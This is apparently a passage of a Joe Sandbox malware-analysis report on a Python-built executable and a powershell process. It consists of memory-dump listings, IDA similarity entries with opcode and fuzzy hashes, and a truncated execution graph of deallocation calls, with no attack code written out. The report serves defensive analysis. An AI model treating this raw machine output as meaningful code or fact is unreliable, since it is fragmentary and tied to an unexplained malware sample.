                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578942677.00007FF81E14F000.00000008.00000001.01000000.0000003B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1579030056.00007FF81E154000.00000004.00000001.01000000.0000003B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1579098759.00007FF81E155000.00000002.00000001.01000000.0000003B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e130000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Err_StringX_get_verify_mode
                                                                                                                                                                                                                                          • String ID: invalid return value from SSL_CTX_get_verify_mode
                                                                                                                                                                                                                                          • API String ID: 3939857436-2501269723
                                                                                                                                                                                                                                          • Opcode ID: bf19c00e48f3c93f4b2e6d366db93e1c0b6c665e4738a8cbfd1a91bb5782b413
                                                                                                                                                                                                                                          • Instruction ID: a29e46f29f3d2d2ed29aee8fbfee02536fd5b96d5fe563f64eeeb62c7de432a8
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bf19c00e48f3c93f4b2e6d366db93e1c0b6c665e4738a8cbfd1a91bb5782b413
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BCF01CA2A08C02C1FB284729D8555781360FB48BB7F580232C61FCA6A0DE1CF8D6C700
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1577633708.00007FF81E081000.00000020.00000001.01000000.0000003C.sdmp, Offset: 00007FF81E080000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577554084.00007FF81E080000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577633708.00007FF81E0F4000.00000020.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577887521.00007FF81E0F6000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578021546.00007FF81E119000.00000008.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578087716.00007FF81E11D000.00000004.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E11E000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E124000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E12B000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e080000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: R_put_errormemcpy
                                                                                                                                                                                                                                          • String ID: ..\s\ssl\ssl_sess.c
                                                                                                                                                                                                                                          • API String ID: 1385177007-2868363209
                                                                                                                                                                                                                                          • Opcode ID: 30f9734ecd00a7bffa40890edf63c63ac05f31dd9d01e44b878c104969c93cc2
                                                                                                                                                                                                                                          • Instruction ID: 0e2b5fb12cf6368e9219d8f2a3c47cf54c79e15b25b642333b06165cdf2d1b2b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 30f9734ecd00a7bffa40890edf63c63ac05f31dd9d01e44b878c104969c93cc2
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EFF0A735F1989287FF60A794C805BAC2390BB503D0F800630E10C46A81DE2D779A8F00
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1577633708.00007FF81E081000.00000020.00000001.01000000.0000003C.sdmp, Offset: 00007FF81E080000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577554084.00007FF81E080000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577633708.00007FF81E0F4000.00000020.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577887521.00007FF81E0F6000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578021546.00007FF81E119000.00000008.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578087716.00007FF81E11D000.00000004.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E11E000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E124000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E12B000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e080000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: R_put_errormemcpy
                                                                                                                                                                                                                                          • String ID: ..\s\ssl\ssl_sess.c
                                                                                                                                                                                                                                          • API String ID: 1385177007-2868363209
                                                                                                                                                                                                                                          • Opcode ID: 17e013de3809daf3472b70231a7f22976cbc54be5ed0b8d231b0a7578bd7facd
                                                                                                                                                                                                                                          • Instruction ID: 110c9620442d4d81c5d1aaa55a6c1fe2695979825fac44a92499729a4b5b7a5e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 17e013de3809daf3472b70231a7f22976cbc54be5ed0b8d231b0a7578bd7facd
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6AF03036F1995687FF60A7A4D405BAC27A4BB54390FD04230F60C46691DE2D7B9A9F10
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1578637831.00007FF81E131000.00000020.00000001.01000000.0000003B.sdmp, Offset: 00007FF81E130000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578429679.00007FF81E130000.00000002.00000001.01000000.0000003B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578694735.00007FF81E13D000.00000002.00000001.01000000.0000003B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578785676.00007FF81E14E000.00000004.00000001.01000000.0000003B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578942677.00007FF81E14F000.00000008.00000001.01000000.0000003B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1579030056.00007FF81E154000.00000004.00000001.01000000.0000003B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1579098759.00007FF81E155000.00000002.00000001.01000000.0000003B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e130000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Capsule_ImportModule_State
                                                                                                                                                                                                                                          • String ID: _socket.CAPI
                                                                                                                                                                                                                                          • API String ID: 2652237932-3774308389
                                                                                                                                                                                                                                          • Opcode ID: 69d9e5c8fe2b35dfd63536f8653224358036cd57499f7bb1451d5f18f37249bf
                                                                                                                                                                                                                                          • Instruction ID: c7376d0f8cf9ace796607ad3fb788ea440ba35bfe192f975dbfd223cc284bb95
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 69d9e5c8fe2b35dfd63536f8653224358036cd57499f7bb1451d5f18f37249bf
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FFE04F60B1BE0281FF149B6194602B423A0AF58FB2FA50734C92E423E0EE3CF5D1C300
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583033638.00007FF81E500000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583104278.00007FF81E51C000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583140748.00007FF81E529000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583198579.00007FF81E52F000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e500000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: write_raw_float_data$write_raw_float_data: bad float size
                                                                                                                                                                                                                                          • API String ID: 0-3509257061
                                                                                                                                                                                                                                          • Opcode ID: 06c206018e490a6a479d9965efcd8b5042c8db2a609b98058c2c7208f0be4b74
                                                                                                                                                                                                                                          • Instruction ID: d0cf042cd9689ec31cda365486f09b1c46186160e59d1b72e3d9c49338ad125f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 06c206018e490a6a479d9965efcd8b5042c8db2a609b98058c2c7208f0be4b74
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6FE02630E14E0AC5D879DB27DCD00B02320AF66BA0FA04B31D10D01010EE1E70C68700
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583033638.00007FF81E500000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583104278.00007FF81E51C000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583140748.00007FF81E529000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583198579.00007FF81E52F000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e500000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Err_ItemStringTuple_
                                                                                                                                                                                                                                          • String ID: abi
                                                                                                                                                                                                                                          • API String ID: 2162364271-3589384412
                                                                                                                                                                                                                                          • Opcode ID: 747a2d40f657fe0e36d7c60a3178cf92b7e4a7e983517d15715ffdb07f394966
                                                                                                                                                                                                                                          • Instruction ID: bef72ac436d32fa6bc1c21e038881b563301cc28ee7d5f26ec67db5e0a17d092
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 747a2d40f657fe0e36d7c60a3178cf92b7e4a7e983517d15715ffdb07f394966
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F8E01A25F05D02C2EA1C9B25CCA42B823E0BF88FA4F944636D90E46260CF3EF49BC300
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583033638.00007FF81E500000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583104278.00007FF81E51C000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583140748.00007FF81E529000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583198579.00007FF81E52F000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e500000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Err_ItemStringTuple_
                                                                                                                                                                                                                                          • String ID: result
                                                                                                                                                                                                                                          • API String ID: 2162364271-325763347
                                                                                                                                                                                                                                          • Opcode ID: 5314b9fbdcce5056c7a7b872b885e55783c0fcb443373b1b9d69e19a9dd0c755
                                                                                                                                                                                                                                          • Instruction ID: 44ba1b585bc44fe8c04e6527b36a05a8c51b90434b73cda38036ac4cccf1f9f7
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5314b9fbdcce5056c7a7b872b885e55783c0fcb443373b1b9d69e19a9dd0c755
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D3E01A35B05D42C2EB0C9B1ADCA53B823A0BF88BA4F944231DA0D46660CF6EF49B9700
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1577633708.00007FF81E081000.00000020.00000001.01000000.0000003C.sdmp, Offset: 00007FF81E080000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577554084.00007FF81E080000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577633708.00007FF81E0F4000.00000020.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577887521.00007FF81E0F6000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578021546.00007FF81E119000.00000008.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578087716.00007FF81E11D000.00000004.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E11E000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E124000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E12B000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e080000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: R_put_error
                                                                                                                                                                                                                                          • String ID: ..\s\ssl\s3_lib.c$m
                                                                                                                                                                                                                                          • API String ID: 1767461275-297842231
                                                                                                                                                                                                                                          • Opcode ID: dabded245b1138d054d01c0e447c6de338ca7fe595687a8483ebc962513b1b14
                                                                                                                                                                                                                                          • Instruction ID: defc04d43cfa555f2c6594f31a2e89a884ca8883306c40656b896a3d5ad5af7f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dabded245b1138d054d01c0e447c6de338ca7fe595687a8483ebc962513b1b14
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3CD01266B08D5986E721DF55F4006E96321F7843A4F440532EB4D02695CF3DF997DE10
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000035.00000002.1614815258.00007FF7BDC60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BDC60000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_53_2_7ff7bdc60000_powershell.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: f3d62a4b8b0d8daf25b900e7644f686254224be890fbeac906dcdeb9fd3d05ec
                                                                                                                                                                                                                                          • Instruction ID: 7ea345e2e6429c5b3ae207a7bf87e727d36d16a93927d9e2c3bd3bb879c1ec91
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f3d62a4b8b0d8daf25b900e7644f686254224be890fbeac906dcdeb9fd3d05ec
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F0813732E0DBC90FE79AAA6C58191B5BBE1EF57221B9801FBD14DC7097E9189C07C361
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000035.00000002.1613758563.00007FF7BDB90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BDB90000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_53_2_7ff7bdb90000_powershell.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: ebd148fbc02bfc18c3cb1aca5c4078228d44c3d2c690d159276f9cd9e4d8fa5d
                                                                                                                                                                                                                                          • Instruction ID: 2e24d88eaa76074319c8b763eb0cfe7fbee0447729367aa36207ae08b8ab6e65
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ebd148fbc02bfc18c3cb1aca5c4078228d44c3d2c690d159276f9cd9e4d8fa5d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5D71E531E0CA498FDB59EB6CD8412EDBBF1EF5A320F54417AD049D7292DA38A802CB55
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000035.00000002.1614815258.00007FF7BDC60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BDC60000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_53_2_7ff7bdc60000_powershell.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 58a4aebfcac063af9787b3daf58056d2b33de2cf218699b292efc5f5f8ad9be7
                                                                                                                                                                                                                                          • Instruction ID: f3a699cb9a81863a97525f68ebf44f1597fdeabc8441dc2a703acd0c6b308855
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 58a4aebfcac063af9787b3daf58056d2b33de2cf218699b292efc5f5f8ad9be7
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4C411E32F0CE494FE79DAA5C64552B9B3D1EFA6221B84117EC10EC318BFD19E8078751
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000035.00000002.1613758563.00007FF7BDB90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BDB90000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_53_2_7ff7bdb90000_powershell.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                                                                                                                                                                          • Instruction ID: 4598adcd63fbaabcb5c6da119e3d2362d75b9fa8d2f2ad47deb340f8e7e9fa61
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7C01677111CB0C4FDB48EF0CE451AA6B7E0FB99364F50066DE58AC3655D636E881CB46

                                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                                          Execution Coverage:0.1%
                                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                          Signature Coverage:4.3%
                                                                                                                                                                                                                                          Total number of Nodes:1526
                                                                                                                                                                                                                                          Total number of Limit Nodes:4
                                                                                                                                                                                                                                          execution_graph 14906 7ff81ec5184c 14907 7ff81ec51870 __scrt_acquire_startup_lock 14906->14907 14908 7ff81ec51e6e _seh_filter_dll 14907->14908 14512 7ff81eca6750 PyObject_GC_UnTrack 14513 7ff81eca677e 14512->14513 14514 7ff81eca676e 14512->14514 14516 7ff81eca6797 14513->14516 14517 7ff81eca6791 _Py_Dealloc 14513->14517 14514->14513 14515 7ff81eca6778 _Py_Dealloc 14514->14515 14515->14513 14518 7ff81eca67b0 14516->14518 14519 7ff81eca67aa _Py_Dealloc 14516->14519 14517->14516 14519->14518 11654 7ff81eca8bd4 _Py_Dealloc 11655 7ff81eca8bf1 11654->11655 11656 7ff81ecad317 11655->11656 11657 7ff81ecad30e _Py_Dealloc 11655->11657 11658 7ff81ecad32c 11656->11658 11659 7ff81ecad323 _Py_Dealloc 11656->11659 11657->11656 11660 7ff81ecad341 11658->11660 11661 7ff81ecad338 _Py_Dealloc 11658->11661 11659->11658 11662 7ff81ecad35d 11660->11662 11663 7ff81ecad354 _Py_Dealloc 11660->11663 11661->11660 11664 7ff81ecad379 11662->11664 11665 7ff81ecad370 _Py_Dealloc 11662->11665 11663->11662 11666 7ff81ecad395 11664->11666 11667 7ff81ecad38c _Py_Dealloc 11664->11667 11665->11664 11668 7ff81ecad3b1 11666->11668 11669 7ff81ecad3a8 _Py_Dealloc 11666->11669 11667->11666 11670 7ff81ecad3cd 11668->11670 11671 7ff81ecad3c4 _Py_Dealloc 11668->11671 11669->11668 11672 7ff81ecad3e6 11670->11672 11673 7ff81ecad3dd _Py_Dealloc 11670->11673 11671->11670 11674 7ff81ecad3ff 11672->11674 11675 7ff81ecad3f6 _Py_Dealloc 11672->11675 11673->11672 11676 7ff81ecad418 11674->11676 11678 7ff81ecad40f _Py_Dealloc 11674->11678 11675->11674 11677 7ff81ecad431 11676->11677 11679 7ff81ecad428 _Py_Dealloc 11676->11679 11680 7ff81ecad44a 11677->11680 11681 7ff81ecad441 _Py_Dealloc 11677->11681 11678->11676 11679->11677 11682 7ff81ecad463 11680->11682 11683 7ff81ecad45a _Py_Dealloc 11680->11683 11681->11680 11684 7ff81ecad47c 11682->11684 11685 7ff81ecad473 _Py_Dealloc 11682->11685 11683->11682 11686 7ff81ecad495 11684->11686 11688 7ff81ecad48c _Py_Dealloc 11684->11688 11685->11684 11687 7ff81ecad4ae 11686->11687 11689 7ff81ecad4a5 _Py_Dealloc 11686->11689 11690 7ff81ecad4c7 11687->11690 11691 7ff81ecad4be _Py_Dealloc 11687->11691 11688->11686 11689->11687 11692 7ff81ecad4e3 11690->11692 11693 7ff81ecad4da _Py_Dealloc 11690->11693 11691->11690 11694 7ff81ecad4ff 11692->11694 11695 7ff81ecad4f6 _Py_Dealloc 11692->11695 11693->11692 11696 7ff81ecad51b 11694->11696 11697 7ff81ecad512 _Py_Dealloc 11694->11697 11695->11694 11698 7ff81ecad537 11696->11698 11699 7ff81ecad52e _Py_Dealloc 11696->11699 11697->11696 11700 7ff81ecad553 11698->11700 11701 7ff81ecad54a _Py_Dealloc 11698->11701 11699->11698 11702 7ff81ecad56f 11700->11702 11703 7ff81ecad566 _Py_Dealloc 11700->11703 11701->11700 11704 7ff81ecad58b 11702->11704 11705 7ff81ecad582 _Py_Dealloc 11702->11705 11703->11702 11706 7ff81ecad5a7 11704->11706 11707 7ff81ecad59e _Py_Dealloc 11704->11707 11705->11704 11708 7ff81ecad5c3 11706->11708 11710 7ff81ecad5ba _Py_Dealloc 11706->11710 11707->11706 11709 7ff81ecad5df 11708->11709 11711 7ff81ecad5d6 _Py_Dealloc 11708->11711 11712 7ff81ecad5fb 11709->11712 11713 7ff81ecad5f2 _Py_Dealloc 11709->11713 11710->11708 11711->11709 11714 7ff81ecad617 11712->11714 11715 7ff81ecad60e _Py_Dealloc 11712->11715 11713->11712 11716 7ff81ecad633 11714->11716 11717 7ff81ecad62a _Py_Dealloc 11714->11717 11715->11714 11718 7ff81ecad64f 11716->11718 11720 7ff81ecad646 _Py_Dealloc 11716->11720 11717->11716 11719 7ff81ecad66b 11718->11719 11721 7ff81ecad662 _Py_Dealloc 11718->11721 11722 7ff81ecad687 11719->11722 11723 7ff81ecad67e _Py_Dealloc 11719->11723 11720->11718 11721->11719 11724 7ff81ecad6a3 11722->11724 11725 7ff81ecad69a _Py_Dealloc 11722->11725 11723->11722 11726 7ff81ecad6bf 11724->11726 11727 7ff81ecad6b6 _Py_Dealloc 11724->11727 11725->11724 11728 7ff81ecad6d2 _Py_Dealloc 11726->11728 11729 7ff81ecad6db 11726->11729 11727->11726 11728->11729 11730 7ff81ecad6ee _Py_Dealloc 11729->11730 11732 7ff81ecad6f7 11729->11732 11730->11732 11731 7ff81ecad713 11734 7ff81ecad72f 11731->11734 11735 7ff81ecad726 _Py_Dealloc 11731->11735 11732->11731 11733 7ff81ecad70a _Py_Dealloc 11732->11733 11733->11731 11736 7ff81ecad74b 11734->11736 11737 7ff81ecad742 _Py_Dealloc 11734->11737 11735->11734 11738 7ff81ecad767 11736->11738 11739 7ff81ecad75e _Py_Dealloc 11736->11739 11737->11736 11740 7ff81ecad783 11738->11740 11742 7ff81ecad77a _Py_Dealloc 11738->11742 11739->11738 11741 7ff81ecad79f 11740->11741 11743 7ff81ecad796 _Py_Dealloc 11740->11743 11744 7ff81ecad7bb 11741->11744 11745 7ff81ecad7b2 _Py_Dealloc 11741->11745 11742->11740 11743->11741 11746 7ff81ecad7d7 11744->11746 11747 7ff81ecad7ce _Py_Dealloc 11744->11747 11745->11744 11748 7ff81ecad7f3 11746->11748 11749 7ff81ecad7ea _Py_Dealloc 11746->11749 11747->11746 11750 7ff81ecad80f 11748->11750 11752 7ff81ecad806 _Py_Dealloc 11748->11752 11749->11748 11751 7ff81ecad82b 11750->11751 11753 7ff81ecad822 _Py_Dealloc 11750->11753 11754 7ff81ecad847 11751->11754 11755 7ff81ecad83e _Py_Dealloc 11751->11755 11752->11750 11753->11751 11756 7ff81ecad863 11754->11756 11757 7ff81ecad85a _Py_Dealloc 11754->11757 11755->11754 11758 7ff81ecad87f 11756->11758 11759 7ff81ecad876 _Py_Dealloc 11756->11759 11757->11756 11760 7ff81ecad89b 11758->11760 11761 7ff81ecad892 _Py_Dealloc 11758->11761 11759->11758 11762 7ff81ecad8b7 11760->11762 11763 7ff81ecad8ae _Py_Dealloc 11760->11763 11761->11760 11764 7ff81ecad8d3 11762->11764 11765 7ff81ecad8ca _Py_Dealloc 11762->11765 11763->11762 11766 7ff81ecad8ef 11764->11766 11767 7ff81ecad8e6 _Py_Dealloc 11764->11767 11765->11764 11768 7ff81ecad90b 11766->11768 11769 7ff81ecad902 _Py_Dealloc 11766->11769 11767->11766 11770 7ff81ecad927 11768->11770 11771 7ff81ecad91e _Py_Dealloc 11768->11771 11769->11768 11772 7ff81ecad943 11770->11772 11774 7ff81ecad93a _Py_Dealloc 11770->11774 11771->11770 11773 7ff81ecad95f 11772->11773 11775 7ff81ecad956 _Py_Dealloc 11772->11775 11776 7ff81ecad97b 11773->11776 11777 7ff81ecad972 _Py_Dealloc 11773->11777 11774->11772 11775->11773 11778 7ff81ecad997 11776->11778 11779 7ff81ecad98e _Py_Dealloc 11776->11779 11777->11776 11780 7ff81ecad9b3 11778->11780 11781 7ff81ecad9aa _Py_Dealloc 11778->11781 11779->11778 11782 7ff81ecad9cf 11780->11782 11784 7ff81ecad9c6 _Py_Dealloc 11780->11784 11781->11780 11783 7ff81ecad9eb 11782->11783 11785 7ff81ecad9e2 _Py_Dealloc 11782->11785 11786 7ff81ecada07 11783->11786 11787 7ff81ecad9fe _Py_Dealloc 11783->11787 11784->11782 11785->11783 11788 7ff81ecada23 11786->11788 11789 7ff81ecada1a _Py_Dealloc 11786->11789 11787->11786 11790 7ff81ecada3f 11788->11790 11791 7ff81ecada36 _Py_Dealloc 11788->11791 11789->11788 11792 7ff81ecada5b 11790->11792 11793 7ff81ecada52 _Py_Dealloc 11790->11793 11791->11790 11794 7ff81ecada77 11792->11794 11795 7ff81ecada6e _Py_Dealloc 11792->11795 11793->11792 11796 7ff81ecada93 11794->11796 11797 7ff81ecada8a _Py_Dealloc 11794->11797 11795->11794 11798 7ff81ecadaaf 11796->11798 11799 7ff81ecadaa6 _Py_Dealloc 11796->11799 11797->11796 11800 7ff81ecadacb 11798->11800 11801 7ff81ecadac2 _Py_Dealloc 11798->11801 11799->11798 11802 7ff81ecadae7 11800->11802 11803 7ff81ecadade _Py_Dealloc 11800->11803 11801->11800 11804 7ff81ecadb03 11802->11804 11806 7ff81ecadafa _Py_Dealloc 11802->11806 11803->11802 11805 7ff81ecadb1f 11804->11805 11807 7ff81ecadb16 _Py_Dealloc 11804->11807 11808 7ff81ecadb46 11805->11808 11809 7ff81ecadb2a _Py_Dealloc 11805->11809 11806->11804 11807->11805 11810 